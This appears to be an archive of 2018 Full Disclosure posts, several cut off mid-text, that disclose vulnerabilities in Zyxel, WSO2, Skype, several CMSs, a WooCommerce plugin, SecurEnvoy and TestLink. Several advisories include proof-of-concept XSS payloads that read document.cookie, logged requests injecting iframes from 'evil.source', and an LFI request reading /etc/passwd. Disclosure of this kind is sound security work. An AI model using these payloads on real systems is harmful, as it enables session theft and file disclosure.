been connecting people to the internet for nearly 30 years. We keep promoting
creativity which meets the needs of customers. This spirit has never been
changed since we developed the world's first integrated 3-in-1 data/fax/voice
modem in 1992. Our ability to adapt and innovate with networking technology
places us at the forefront of understanding connectivity for telco/service
providers, businesses and home users.

We're building the networks of tomorrow, helping unlock the world's potential
and meeting the needs of the modern workplace; powering people at work, life
and play. We stand side-by-side with our customers and partners to share new
approaches to networking that will unleash their abilities. Loyal friend,
powerful ally, reliable resource — we are Zyxel, Your Networking Ally."

Source: https://www.zyxel.com/about_zyxel/company_overview.shtml


Business recommendation:

SEC Consult recommends that Zyxel customers upgrade the firmware to the latest
version available. A thorough security review should be performed by security
professionals to identify further potential security issues.


Vulnerability overview/description:
---
1) Reflected Cross-Site Scripting (XSS)
A reflected cross-site scripting vulnerability was identified in
'free_time_failed.cgi' in the admin interface. The parameter 'err_msg' is
returned without any sanitization of the input. An attacker, for example,
can exploit this vulnerability to steal cookies from the attacked user in
order to hijack a session and gain access to the device.


Proof of concept:
-
1) Reflected Cross-Site Scripting (XSS)
By opening the following link, contents of the 'arip' and 'zy_pc_browser'
cookies will be displayed.

http:///free_time_failed.cgi?err_msg=alert(document.cookie);
https:///free_time_failed.cgi?err_msg=alert(document.cookie);


Vulnerable / tested versions:
-
The following versions are affected:
Zyxel ZyWall USG 110   ZLD 4.30 and earlier
Zyxel ZyWall USG 210   ZLD 4.30 and earlier
Zyxel ZyWall USG 310   ZLD 4.30 and earlier
Zyxel ZyWall USG 1100  ZLD 4.30 and earlier
Zyxel ZyWall USG 1900  ZLD 4.30 and earlier
Zyxel ZyWall USG 2200-VPN  ZLD 4.30 and earlier


Vendor contact timeline:

2018-02-07: Contacting vendor through secur...@zyxel.com.tw
2018-02-08: Vendor responded with contact information and a PGP key.
Sent the encrypted advisory to the contact.
2018-02-09: Contact confirmed that the advisory was received.
2018-02-16: Contact confirmed the vulnerability and stated that the ZyWALL
series is vulnerable to the reported vulnerability. The contact also stated
that the vulnerability will be fixed by the end of March.
Requested more information regarding version numbers and other
affected devices.
2018-02-23: Contact confirmed that the devices are vulnerable in firmware
version 4.30 and before.
2018-03-21: Contact informed us that the new firmware version will be ZLD 4.31
and that it will be released on 2018-04-17. Shifted release of
advisory to 2018-04-17.
2018-04-12: Informed the contact that the advisory will be released in a few days.
2018-04-17: Asked the vendor if ZLD 4.31 was released. Didn't find the new
version on the customer portal. E-mail was blocked and returned.
2018-04-18: Found the new version (ZLD 4.31) on the customer portal.
2018-04-24: Advisory release.


Solution:
-
Install firmware version ZLD 4.31 from the vendor's website to fix this issue:

https://www.zyxel.com/support/download_landing.shtml


Workaround:
---
Restrict network access to the device.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asi

[FD] SEC Consult SA-20180423-0 :: Multiple Stored XSS Vulnerabilities in WSO2 Carbon and Dashboard Server

2018-04-24 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180423-0 >
===
  title: Multiple Stored XSS Vulnerabilities
product: WSO2 Carbon, WSO2 Dashboard Server
 vulnerable version: WSO2 Identity Server 5.3.0
  fixed version: WSO2 Identity Server 5.5.0
 CVE number: CVE-2018-8716
 impact: high
   homepage: https://wso2.com/products/dashboard
  found: 2017-12-13
 by: W. Schober (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"WSO2 Carbon redefines middleware by providing an integrated and componentized
middleware platform that adapts to the specific needs of any enterprise
IT project - on premise or in the cloud.
100% open source and standards-based, WSO2 Carbon enables developers to rapidly
orchestrate business processes, compose applications and develop services using
WSO2 Developer Studio and a broad range of business and technical services that
integrate with legacy, packaged and SaaS applications.
The lean, complete, OSGi-based platform includes more than 175 components – OSGi
bundles or Carbon features. The WSO2 Carbon core framework functions as
“Eclipse for servers” and includes common capabilities shared by all WSO2
products, such as built-in registry, user management, transports, security,
logging, clustering, caching and throttling services, co-ordination, and a
GUI framework."

Source: https://wso2.com/products/carbon/

"The WSO2 Dashboard Server (formerly WSO2 User Engagement Server) helps to
rapidly create visually appealing and engaging web components such as
dashboards, and gadgets, and unlocking data for business intelligence and
monitoring. With the host of capabilities that Dashboard Server provides
out-of-the-box, going from data to screen has never been easier."

Source: https://wso2.com/products/dashboard-server/


Business recommendation:

SEC Consult recommends a thorough security review conducted by security
professionals to identify and resolve all security issues.


Vulnerability overview/description:
---
1) Stored Cross-Site Scripting in WSO2 Dashboard (CVE-2018-8716)
The dashboard is used by the end-users to manage their accounts, change
passwords, alter their profiles, or change certain settings. An attacker is able
to inject arbitrary JavaScript payloads into various textboxes (username, home
address, lastname, firstname, etc).

The payloads are permanently stored in the dashboard and triggered every time
the dashboard is visited. The payload is also potentially triggered in the carbon
part of WSO2, which means that an attacker would be able to inject payloads
from the front-end application into a middleware application, which is not
accessible from the internet and attack administrators.

2) Stored Cross-Site Scripting in WSO2 Carbon
The carbon UI offers a feature to add multiple BPS-Worker Hosts. In the worker
host URL an arbitrary JavaScript payload can be injected and permanently stored
in the web application.


Proof of concept:
-
1) Stored Cross-Site Scripting in WSO2 Dashboard
The following input fields are vulnerable and JavaScript payloads can be
directly injected:
- Firstname
- Lastname
- Username
- Address

It is suspected that all user inputs are returned unfiltered in all server
responses.

2) Stored Cross-Site Scripting in WSO2 Carbon
To demonstrate the vulnerability, it is sufficient to add a new BPS worker and
set the URL to the following payload: ">

Every time the carbon middleware application is accessed, the payload is
triggered.


Vulnerable / tested versions:
-
The following version has been tested which was the most recent version
at the time of discovery:

* WSO2IS 5.3.0


Vendor contact timeline:

2018-01-25: Contacting vendor through secur...@wso2.com
2018-02-08: Asking for status update. Vendor responds that they are
still investigating the issue.
2018-02-21: Vendor responds with release date and further details
concerning the nature of the vulnerabilities. The XSS in the
Carbon component was a duplicate and should be already fixed.
Concerning the XSS in the dashboard a fix is implemented
and will be rolled out with the release of WSO2 Identity
Server 5.5.0.
2018-03-14: Requesting CVE from Mitre for the stored XSS in the Dashboard.
2018-03-15: Mitre assigned CVE-2018-8716.
2018-03-26: Vendor informed us that the final release of the updated
software will be o

[FD] Microsoft Skype Mobile v81.2 & v8.13 - Remote Denial of Service Vulnerability

2018-03-27 Thread Vulnerability Lab
ching inside by a resize of the image (view demo video)
8. Now the message with the smilies must be quoted or copied and then
transferred to any other Skype input field where smilies are supported
9. Pasting around 50 of them results in unexpected memory errors and
uncaught exceptions or access violations
Note: Tested for Android Samsung and Apple iOS. The resize of the larger image
results in a memory corruption
10. Successful reproduction of the vulnerability!


PoC Video: Shows the local issue and the remote triggered bug ...
https://www.youtube.com/watch?v=2vcdQb98zE0


Solution - Fix & Patch:
===
Secure memory allocation when resizing emoticon images during rendering in
transfers through the Skype mobile software client.
Microsoft resolved the vulnerability and prepared updated versions v8.17 &
v8.18. In both versions the security issue is known as patched.


Security Risk:
==
The security risk of the vulnerability in the Skype mobile software client for
iOS and Android is estimated as medium (cvss 4.7).


Credits & Authors:
==
Benjamin Kunz Mejri [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential 
loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability mainly for 
consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, 
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section:    magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partial usage, of this file,
resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website are
trademarks of the vulnerability-lab team & the specific authors or managers. To
record, list, modify, use or edit our material contact (admin@) to ask for
permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Sandoba CP:Shop CMS v2016.1 - Multiple Cross Site Scripting Vulnerabilities

2018-03-27 Thread Vulnerability Lab
r[https://cpshop.localhost:8080admin.php]
  Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes]
  Connection[keep-alive]
   Response Header:
  server[Apache/2.4.27]
  x-powered-by[PHP/7.0.20]
  expires[Thu, 19 Nov 1981 08:52:00 GMT]
  cache-control[no-store, no-cache, must-revalidate]
  pragma[no-cache]
  x-frame-options[SAMEORIGIN]
  content-encoding[gzip]
  set-cookie[language=de; expires=Tue, 20-Feb-2018 13:00:40 GMT; Max-Age=259200; path=/]
  content-type[text/html; charset=utf-8]
  X-Firefox-Spdy[h2]
-
Status: 302[Found]
GET https://cpshop.localhost:8080/evil.source
Mime Type[text/html]
   Request Header:
  Host[cpshop.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate, br]
  Referer[https://cpshop.localhost:8080admin.php]
  Cookie[shop_userkey=afb404c7622db6ced7a120e8e4e24505; log_data=DEMOADMINSHOP; PHPSESSID=03f32863066e90b45f109d7b1d5a0b5e; language=de; cookieconsent_dismissed=yes]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  server[Apache/2.4.27]
  location[http://cpshop.localhost:8080]
  content-length[296]
  content-type[text/html; charset=iso-8859-1]
  X-Firefox-Spdy[h2]
-
Status: pending[]
GET http://cpshop.localhost:8080/cpshop/admin.php?file=news&clean=yes&ajax=yes&form%5Bsearch%5D=http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2Bonl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news
Mime Type[unknown]
   Request Header:
  Host[cpshop.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
  Accept[*/*]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  X-Requested-With[XMLHttpRequest]
  Referer[http://cpshop.localhost:8080/cpshop/admin.php]
  Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
  DNT[1]
-
14:06:37.847[179ms][total 538ms] Status: 200[OK]
GET http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=http%3A%2F%2Fcpshop.localhost:8080%2Fcpshop%2Fadmin.php%3Fform%255Bsearch%255D%3D%2522%253E%253Ciframe%2Bsrc%253Devil.source%2Bonl&form%5Bvar%5D=1&form%5Bposter%5D=0&form%5Bcategory%5D=0&file=news
Mime Type[text/html]
   Request Header:
  Host[cpshop.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  Referer[http://cpshop.localhost:8080/cpshop/admin.php]
  Cookie[log_data=DEMOADMINCMS; PHPSESSID=aa820d024a8b72f3a57e12e72cc63bb6; language=de]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache/2.4.27]
  X-Powered-By[PHP/7.0.20]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate]
  Pragma[no-cache]
  X-Frame-Options[SAMEORIGIN]
  Content-Encoding[gzip]
  Set-Cookie[language=de; expires=Tue, 20-Feb-2018 13:06:37 GMT; Max-Age=259200; path=/]
  Upgrade[h2c]
  Connection[Upgrade, Keep-Alive]
  Keep-Alive[timeout=5, max=100]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=utf-8]


Reference(s):
http://cpshop.localhost:8080/cpshop/admin.php?form%5Bsearch%5D=
http://cpshop.localhost:8080/cpshop/admin.php#!file=help&mode=search&search=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=fancybox&form[path]=
http://cpshop.localhost:8080/cpshop/admin.php?form[search]=https://www.test.de#!file=files&mode=rename_dir&form[dir]=
https://cpshop.localhost:8080/cpshop/admin.php#!file=files&mode=rename_dir&form[dir]=


Solution - Fix & Patch:
===
The cross site vulnerabilities can be resolved by implementing htmlentities
and a secure input restriction of characters.



Security Risk:
==
The security risk of the client-side cross site scripting web vulnerabilities 
in the web-application are estimated as medium (cvss 3.4).


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab



[FD] Weblication CMS Core & Grid v12.6.24 - Multiple Cross Site Scripting Vulnerabilities

2018-03-27 Thread Vulnerability Lab
024.000]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   POST-Daten:
  action[editOptionsProject]
  path[%2Fimg-src-x-img-img-src-x-img-]
  title[%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.domain%29%3E%2520%22%3E%3Ciframe+src%3D%22evil.source%22+onload%3Dalert%28document.cookie%29%3E]
  pathProjectGlobal[%2Fdefault-wGlobal]
  pathProjectLayout[]
  language[br]
  projectConnect[%2Fimg-src-x-img-img-src-x-img-]
  hostOnly[]
  pageOffline[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Foffline.php]
  permissionDenied[%2Fimg-src-x-img-img-src-x-img-%2FwGlobal%2Fcontent%2Ferrordocs%2Fpermission-denied.php]
  W_PRETMP_groups%5B%5D[%5BW_ID%5D]
  backupGroup[]
   Response Header:
  Server[Apache/2.4.27]
  X-Powered-By[PHP/7.0.20]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate]
  Vary[Accept-Encoding]
  Keep-Alive[timeout=5, max=100]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-
Mime Type[text/html]
   Request Header:
  Host[grid.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Referer[https://grid.localhost:8080/weblication/grid5/apps/wEditorWd8/index.php?action=showfileedit&path=/default-wGlobal/wGlobal/content/variables/default.wVariables.php&target=be&referrer=/de/index.php&display=default&editsource=&hasPlaceholdersToInsert=0]
  Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache/2.4.27]
  X-Powered-By[PHP/7.0.20]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate]
  Pragma[no-cache]
  Content-Encoding[gzip]
  Vary[Accept-Encoding]
  Keep-Alive[timeout=5, max=97]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET https://grid.localhost:8080/weblication/grid5/scripts/wEventmanager.php?action=showEvents&path=/img-src-x-img-img-src-x-img-&type=project&target=embed
Mime Type[text/html]
   Request Header:
  Host[grid.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Referer[https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php?action=showMaskEditOptionsProject&path=/img-src-x-img-img-src-x-img-]
  Cookie[WSESSIONID=2a3af57351f0a4ea3cbdd39ac5763954; wCc=1; lastCheckUpdate=1518869664242; lastVersion=012.006.024.000]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache/2.4.27]
  X-Powered-By[PHP/7.0.20]
  Expires[Thu, 19 Nov 1981 08:52:00 GMT]
  Cache-Control[no-store, no-cache, must-revalidate]
  Pragma[no-cache]
  Keep-Alive[timeout=5, max=96]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]


Reference(s):
https://grid.localhost:8080/
https://grid.localhost:8080/weblication/
https://grid.localhost:8080/weblication/grid5/
https://grid.localhost:8080/weblication/grid5/scripts/
https://grid.localhost:8080/weblication/grid5/scripts/wFilemanager.php


Solution - Fix & Patch:
===
The vulnerability can be resolved by sanitizing the delivered input through
the wFilemanager.php file.
Parse in the output location the execution point in the Inhaltsprojekte to
resolve the issue.


Security Risk:
==
The security risk of the persistent cross site scripting vulnerability in the 
web-application is estimated as medium (cvss 3.5).



Credits & Authors:
==
Benjamin K.M. [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.



[FD] AEF CMS v1.0.9 - (PM) Persistent Cross Site Scripting Vulnerability

2018-03-27 Thread Vulnerability Lab
;ucpact=sendsaved&pmid=1]
  Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   POST-Daten:
  pmrecipients[admin]
  pmsubject[test]
  pmbody[This+is+a+private+test+message+with+payload+in+the+ftp+link%0D%0A%0D%0A]
  postcode[yerudyyk4joz8ea5]
  pmsaveinsentitems[on]
  sendpm[Send+PM]
   Response Header:
  Server[Apache]
  X-Powered-By[PHP/5.4.45]
  Content-Length[217]
  Content-Type[text/html; charset=ISO-8859-1]
-
Status: 200[OK]
GET https://aeforums.localhost:8000/AEF/evil.source 
Mime Type[text/html]
   Request Header:
  Host[aeforums.localhost:8000]
  User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Referer[https://aeforums.localhost:8000/AEF/index.php?act=usercp&ucpact=sendsaved&pmid=1]
  Cookie[AEFCookies1526[aefsid]=jmik0sqtslneqffjl537i931brqh3tzr; AEFCookies8381[aefsid]=x1m0rs9lhcl6hl3tbq7qbdh9jn0xsnsf]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache]
  Accept-Ranges[bytes]
  Content-Length[431]
  Content-Type[text/html; charset=UTF-8]


Reference(s):
https://aeforums.localhost:8000/AEF/
https://aeforums.localhost:8000/AEF/index.php


Solution - Fix & Patch:
===
The security vulnerability can be patched by sanitizing the ftp link element
input field in the private message module.
Parse in the editor the output location for the link to prevent the execution
point of the issue.


Security Risk:
==
The security risk of the persistent cross site scripting web vulnerability in 
the open-source web-application is estimated as medium (cvss 4.4).


Credits & Authors:
==
Benjamin K.M. [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.



[FD] SEC Consult SA-20180314-0 :: Arbitrary Shortcode Execution & Local File Inclusion in WooCommerce Products Filter (PluginUs.Net)

2018-03-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180314-0 >
===
  title: Arbitrary Shortcode Execution & Local File Inclusion
product: WOOF - WooCommerce Products Filter (PluginUs.Net)
 vulnerable version: 1.1.9
  fixed version: 2.2.0
 CVE number: (requested but not yet received)
 impact: Critical
   homepage: https://pluginus.net/
  found: 2018-02-20
 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"PluginUs.Net is a little team of talented professionals from Ukraine. Unlike
most of the big companies on the net, we believe in individual approach to
every our customer. Web development is our passion and we always try to go an
extra mile over our clients' expectations.

Our team specializes in development of WordPress plugins. It's always exciting
to try new technologies and approaches to get the project done and impress
clients by realization of their ideas!"

Source: https://pluginus.net/about-us/


Business recommendation:

SEC Consult recommends upgrading to the latest version available
as soon as possible. Further detailed security tests should be performed
in order to identify potential other security issues.


Vulnerability overview/description:
---
1. Arbitrary Shortcode Execution
The plugin implemented a page redraw AJAX function accessible to anyone
without any authentication.

WordPress shortcode markup in the "shortcode" parameters would be evaluated.
Normally unauthenticated users can't evaluate shortcodes as they are often
sensitive.

Additionally, it is noted that there are other implemented shortcodes that are
being used in this plugin which can be abused through the same attack. Worse,
some of them could lead to remote code execution.


2. Local File Inclusion
The vulnerability is due to the lack of args/input validation on render_html
before allowing it to be called by extract(), a PHP built-in function. Because
of this, the supplied args/input can be used to overwrite the $pagepath
variable which then could lead to local file inclusion attack.


Proof of concept:
-
1. Arbitrary Shortcode Execution
The parameter "shortcode" within the "admin-ajax.php" script is affected by
the code execution vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]

action=woof_redraw_woof&shortcode=<>


2. Local File Inclusion
The parameter "shortcode" within the "admin-ajax.php" script is affected by
the local file inclusion vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]

action=woof_redraw_woof&shortcode=woof_search_options pagepath=/etc/passwd


Vulnerable / tested versions:
-
PluginUs.Net WooCommerce Products Filter version 1.1.9 has been tested and
found to be vulnerable.


Vendor contact timeline:

2018-02-20: Contacting vendor through realmag...@gmail.com
2018-02-20: Vendor agreed to proceed without encrypted channel
2018-02-21: Sent security advisory to vendor
2018-02-26: Vendor sent patch containing the fixes
2018-02-26: Informed vendor the patch doesn't fully mitigate the vulnerability
2018-03-12: Request update from vendor
2018-03-12: Vendor said they already published the patch
2018-03-14: Public release of security advisory


Solution:
-
The vendor provides an updated version and users are urged to upgrade to version
2.2.0 immediately:

https://www.woocommerce-filter.com/update-woocommerce-products-filter-v-2-2-0/


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your applicatio

[FD] PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$

2018-03-13 Thread Vulnerability Lab
Title: PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$

URL:
https://www.vulnerability-db.com/?q=articles/2018/03/13/paypal-inc-increases-bug-bounty-payments-2018-3

#bugbounty #security #research #infosec

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] PayPal Inc - New Venmo Bug Bounty Program

2018-03-13 Thread Vulnerability Lab
Title: PayPal Inc - New Venmo Bug Bounty Program

URL:
https://www.vulnerability-db.com/?q=articles/2018/02/27/paypal-inc-updates-bug-bounty-program-venmo-payments-services

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com




[FD] SEC Consult SA-20180312-0 :: Multiple Critical Vulnerabilities in SecurEnvoy SecurMail

2018-03-12 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180312-0 >
===
  title: Multiple Critical Vulnerabilities
product: SecurEnvoy SecurMail
 vulnerable version: 9.1.501
  fixed version: 9.2.501 or hotfix patch "1_012018"
 CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704,
 CVE-2018-7705, CVE-2018-7706, CVE-2018-7707
 impact: Critical
   homepage: https://www.securenvoy.com/
  found: 2017-11
 by: W. Ettlinger (Office Vienna)
 SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Sending and receiving encrypted emails is not an easy or simple experience.
Businesses rely on email with an increasing amount of sensitive data sent across
their networks. A revolutionary approach that doesn't suffer from the overheads
of deployment and encryption management; just rock-solid security to give you
100% confidence in your business communications."

URL: https://www.securenvoy.com/products/securmail/key-features.shtm


Business recommendation:

During a brief crash test of the SecurEnvoy SecurMail application several severe
vulnerabilities have been identified that break the core security promises of
the product.

These vulnerabilities open the possibility for several different attack
scenarios that allow an attacker to read other users' encrypted e-mails and
overwrite or delete e-mails stored in other users' inboxes.

As we have identified several critical vulnerabilities within a very short time
frame we expect numerous other vulnerabilities to be present.

As other SecurEnvoy products (besides the analyzed SecurMail) appear
to be highly integrated (all products are installed with a single setup
file) we suspect other components to also suffer from severe security deficits.

We recommend not to use SecurEnvoy products (especially SecurMail) in a
production environment until:
* a comprehensive security audit has been performed and
* state of the art security mechanisms have been adopted.


Vulnerability overview/description:
---
1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707)
SEC Consult did not find any functionality that encodes user input when creating
HTML pages. Therefore persistent and reflected cross site scripting attacks are
possible throughout the application.

Some pages fail to properly decode URL encoded parameters. Because of this,
cross site scripting cannot be exploited on these pages in most browsers.


2) Path Traversal (CVE-2018-7705, CVE-2018-7706)
SEC Consult did not find any path traversal checks throughout the application.
Since the application uses encrypted files as the primary method of data
storage, this vulnerability can be exploited at several points.

Using this vulnerability, a legitimate recipient can read mails sent to other
recipients in plain text!


3) Insecure Direct Object Reference (CVE-2018-7704)
Authorization checks are only partially implemented. This allows a legitimate
recipient to read mails sent to other users in plain text.


4) Missing Authentication and Authorization (CVE-2018-7702)
In order to send encrypted e-mails a client does not need to authenticate on the
SecurEnvoy server. Therefore anyone with network access to the server can
arbitrarily send e-mails that appear to come from an arbitrary sender address.

Moreover, an attacker with network access to the server can re-send previous
communication to arbitrary recipients. This allows him/her to extract all
e-mails stored on the server. An attacker could also modify arbitrary messages
stored on the server.


5) Cross Site Request Forgery (CVE-2018-7701)
SEC Consult did not find any protection against cross site request forgery. An
attacker could use this vulnerability to delete a victim's e-mail or to
impersonate the victim and reply to his/her e-mails.


Since these vulnerabilities were found during a very short time frame, SEC
Consult believes that the product may contain a large number of other security
vulnerabilities. As already several core security promises have been broken
during this short crash test, no further tests were conducted.


Proof of concept:
-
1) Cross Site Scripting
a) The following HTML fragments demonstrates reflected cross site scripting
   (CVE-2018-7703):

--- snip ---

  
  

--- snip ---

b) E-mails that are sent using the HTML format can contain any 

[FD] SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management

2018-02-28 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180228-0 >
===
  title: Insecure Direct Object Reference
product: TestLink Open Source Test Management
 vulnerable version: <1.9.17
  fixed version: 1.9.17 (after November 2017), and the current
 "testlink_1_9" branch
 CVE number: -
 impact: Medium
   homepage: http://testlink.org/
  found: 2017-09-22
 by: T. Weber (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal
 Moscow - Munich - Kuala Lumpur - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"TestLink is a web based test management and test execution system.
It enables quality assurance teams to create and manage their test
cases as well as to organize them into test plans. These test plans
allow team members to execute test cases and track test results
dynamically."

Source: https://github.com/TestLinkOpenSourceTRMS/testlink-code


Business recommendation:

SEC Consult advises to immediately install the available updates as attackers
might gain access to sensitive data belonging to other users.

A thorough security review performed by security professionals is highly
recommended in order to identify potential further security deficiencies.


Vulnerability overview/description:
---
1) Insecure Direct Object Reference
An unauthenticated user can gain access to referenced files which are produced
by different test cases. By using a simple ID iterator, all produced output
data can be gathered from the whole system.

The actual impact strongly depends on the classification of the produced data
which is referenced. Therefore, the risk can vary from low to critical
depending on the use case.


Proof of concept:
-
1) Insecure Direct Object Reference
An unauthenticated attacker can download data from the TestLink environment
by using the following url:
